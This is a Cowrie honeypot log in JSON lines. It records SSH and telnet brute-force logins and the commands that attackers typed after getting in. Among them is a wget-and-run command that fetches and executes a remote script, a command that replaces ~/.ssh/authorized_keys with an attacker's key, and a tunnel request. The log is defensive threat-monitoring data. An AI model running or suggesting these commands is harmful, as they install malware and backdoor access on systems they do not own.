{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41018,"dst_ip":"1.2.3.4","dst_port":23,"session":"b8bcd1d7d9df","protocol":"telnet","message":"New connection: 212.227.125.160:41018 (1.2.3.4:23) [session: b8bcd1d7d9df]","sensor":"my-vps","timestamp":"2025-08-26T18:25:12.985281Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41500,"dst_ip":"1.2.3.4","dst_port":22,"session":"91d1bfc68c1f","protocol":"ssh","message":"New connection: 212.227.235.229:41500 (1.2.3.4:22) [session: 91d1bfc68c1f]","sensor":"my-vps","timestamp":"2025-08-26T18:25:16.601041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:25:16.601904Z","src_ip":"212.227.235.229","session":"91d1bfc68c1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:25:16.834132Z","src_ip":"212.227.235.229","session":"91d1bfc68c1f"}
{"eventid":"cowrie.login.failed","username":"celeryuser","password":"celeryuser","message":"login attempt [celeryuser/celeryuser] failed","sensor":"my-vps","timestamp":"2025-08-26T18:25:17.804217Z","src_ip":"212.227.235.229","session":"91d1bfc68c1f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:25:19.038500Z","src_ip":"212.227.235.229","session":"91d1bfc68c1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47594,"dst_ip":"1.2.3.4","dst_port":22,"session":"e944df5f8566","protocol":"ssh","message":"New connection: 212.227.235.229:47594 (1.2.3.4:22) [session: e944df5f8566]","sensor":"my-vps","timestamp":"2025-08-26T18:25:20.654265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:25:21.094380Z","src_ip":"212.227.235.229","session":"e944df5f8566"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:25:21.095145Z","src_ip":"212.227.235.229","session":"e944df5f8566"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:25:22.289263Z","src_ip":"212.227.235.229","session":"e944df5f8566"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:25:22.886580Z","src_ip":"212.227.235.229","session":"e944df5f8566"}
{"eventid":"cowrie.command.input","input":"wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","message":"CMD: wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","sensor":"my-vps","timestamp":"2025-08-26T18:25:22.887360Z","src_ip":"212.227.235.229","session":"e944df5f8566"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","size":138,"shasum":"958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:25:22.998217Z","src_ip":"212.227.235.229","session":"e944df5f8566"}
{"eventid":"cowrie.session.file_download","url":"http://23.146.184.21/adb.sh","outfile":"var/lib/cowrie/downloads/5b9210db87cfb74d5a953470ac82b04621cf663632b8f37a000f2aa88f103869","shasum":"5b9210db87cfb74d5a953470ac82b04621cf663632b8f37a000f2aa88f103869","sensor":"my-vps","timestamp":"2025-08-26T18:25:23.102610Z","message":"Downloaded URL (http://23.146.184.21/adb.sh) with SHA-256 5b9210db87cfb74d5a953470ac82b04621cf663632b8f37a000f2aa88f103869 to var/lib/cowrie/downloads/5b9210db87cfb74d5a953470ac82b04621cf663632b8f37a000f2aa88f103869","src_ip":"212.227.235.229","session":"e944df5f8566"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:25:23.107080Z","src_ip":"212.227.235.229","session":"e944df5f8566"}
{"eventid":"cowrie.session.closed","duration":12.949996709823608,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:25:25.935209Z","src_ip":"212.227.125.160","session":"b8bcd1d7d9df"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":28181,"dst_ip":"1.2.3.4","dst_port":22,"session":"f67f43c9b70c","protocol":"ssh","message":"New connection: 213.108.243.7:28181 (1.2.3.4:22) [session: f67f43c9b70c]","sensor":"my-vps","timestamp":"2025-08-26T18:25:57.239192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:25:57.487411Z","src_ip":"213.108.243.7","session":"f67f43c9b70c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:25:57.488618Z","src_ip":"213.108.243.7","session":"f67f43c9b70c"}
{"eventid":"cowrie.login.success","username":"root","password":"Password147","message":"login attempt [root/Password147] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:25:58.660084Z","src_ip":"213.108.243.7","session":"f67f43c9b70c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:25:59.055712Z","src_ip":"213.108.243.7","session":"f67f43c9b70c"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-26T18:25:59.056460Z","src_ip":"213.108.243.7","session":"f67f43c9b70c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:25:59.213209Z","src_ip":"213.108.243.7","session":"f67f43c9b70c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:25:59.269866Z","src_ip":"213.108.243.7","session":"f67f43c9b70c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43898,"dst_ip":"1.2.3.4","dst_port":22,"session":"03be5a0ed10d","protocol":"ssh","message":"New connection: 212.227.235.229:43898 (1.2.3.4:22) [session: 03be5a0ed10d]","sensor":"my-vps","timestamp":"2025-08-26T18:27:21.662119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:27:21.663158Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:27:21.897117Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2023","message":"login attempt [root/Test@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:27:22.875894Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:27:23.412729Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:27:23.413440Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:27:23.414817Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:27:23.651045Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:27:24.179931Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:27:24.180663Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:27:24.417915Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:27:24.419085Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":35188,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d1bae22f29c","protocol":"ssh","message":"New connection: 45.88.8.186:35188 (1.2.3.4:22) [session: 5d1bae22f29c]","sensor":"my-vps","timestamp":"2025-08-26T18:27:28.607115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:27:29.062470Z","src_ip":"45.88.8.186","session":"5d1bae22f29c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:27:29.063673Z","src_ip":"45.88.8.186","session":"5d1bae22f29c"}
{"eventid":"cowrie.login.success","username":"root","password":"winners","message":"login attempt [root/winners] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:27:31.367798Z","src_ip":"45.88.8.186","session":"5d1bae22f29c"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:27:32.686879Z","src_ip":"45.88.8.186","session":"5d1bae22f29c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58860,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7e51dd85b74","protocol":"ssh","message":"New connection: 212.227.235.229:58860 (1.2.3.4:22) [session: c7e51dd85b74]","sensor":"my-vps","timestamp":"2025-08-26T18:27:32.735990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:27:32.736758Z","src_ip":"212.227.235.229","session":"c7e51dd85b74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:27:32.972756Z","src_ip":"212.227.235.229","session":"c7e51dd85b74"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:27:33.957464Z","src_ip":"212.227.235.229","session":"c7e51dd85b74"}
{"eventid":"cowrie.session.closed","duration":"12.5","message":"Connection lost after 12.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:27:34.195332Z","src_ip":"212.227.235.229","session":"03be5a0ed10d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:27:34.196464Z","src_ip":"212.227.235.229","session":"c7e51dd85b74"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":37192,"dst_ip":"1.2.3.4","dst_port":22,"session":"015207308d3a","protocol":"ssh","message":"New connection: 194.0.234.21:37192 (1.2.3.4:22) [session: 015207308d3a]","sensor":"my-vps","timestamp":"2025-08-26T18:28:14.333298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T18:28:14.334125Z","src_ip":"194.0.234.21","session":"015207308d3a"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T18:28:14.352966Z","src_ip":"194.0.234.21","session":"015207308d3a"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:28:14.436140Z","src_ip":"194.0.234.21","session":"015207308d3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.77.155.121","dst_port":443,"src_ip":"194.0.234.21","src_port":52080,"message":"direct-tcp connection request to 54.77.155.121:443 from 127.0.0.1:52080","sensor":"my-vps","timestamp":"2025-08-26T18:28:14.847106Z","session":"015207308d3a"}
